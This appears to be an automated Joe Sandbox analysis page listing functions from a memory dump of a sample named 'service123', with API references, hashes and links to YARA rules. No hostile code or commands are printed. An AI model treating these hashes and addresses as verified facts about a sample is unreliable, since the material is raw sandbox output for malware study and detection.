Instruction Fuzzy Hash: 79310770649F089FC300CE59C49139EB7F9EB89358F44C92ADA9887B42D334DC64DB51

Function 6C94BFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 4c705725c65c456eea982ecd460ef1b057a2ea61756ebecddeaf94824583f5c0
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: F4F020345CC82ACE97206B2D40108A9B33BBA6B70CF9AC882C480ABF29C311D54BC741

Function 6C94BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42b926ea5657487540330ffa4c09a81275036de6089332217492ac519e432cb
Instruction ID: 708636fcfcd63b847370517bf76d1f6d0a1f3616415689cb07128b952d872683
Opcode Fuzzy Hash: e42b926ea5657487540330ffa4c09a81275036de6089332217492ac519e432cb
Instruction Fuzzy Hash: 1401BD73A19E2603E3004E34C4E0325B6A25B83318F09C6A9CD7917F8AC234D819E750

Function 6C94BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 474c456172c42c77824236efe48a3fe8635d59d9e733de386ba84f989a083ae0
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 35E08C3A64EB1A4B8710AEA8B4400BFB264DB6235CF565C28C908A3E00D741E858C2C2

Function 6C94BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: d8ddd946217e8748a1f7aba088349b7e37da4fb9c0b9246cd3bae2b62b58ce9e
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 3AD0A73454D61B4B8B049F2C40988ADF3F66B5730CB5B9C94C005F3E05DB21EA1AC604

Function 6C94BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 4f82d49b50ab1f1c1536ce73c10f57cad4422aab9e3ce8193cbd0b84ef886fe6
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 55D01778189B098F8304EF18D1948A9B7F5AB5B309F429D69C40897F20D731D408CA11

Function 6C94BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 0230d947bfac83c376c8a9c63e5b7ac58c6756b96fd360024550337260fdc675
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 75C0123998D7194BC3106EA8105036AF2A59B27208F576C18884573F008B51E815C555

Function 6C94BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: a2deee0220b5be7eec220498be075956d1563de867aadc0beb73e80379b1c804
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: DAC0123D65D7158B8310EE9490504AAB274AB6B308F462C54C401B3F008760E419D551

Function 6C94BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: adee70359b15f5804b7a2bb3e18fa89abb4aeb3093da1b9dfa0f56c8b43ec39b
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 34C08C389CCB194703007E181090079B2A54727228F872D14C00073F00CF02D859C054

Function 6C94C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
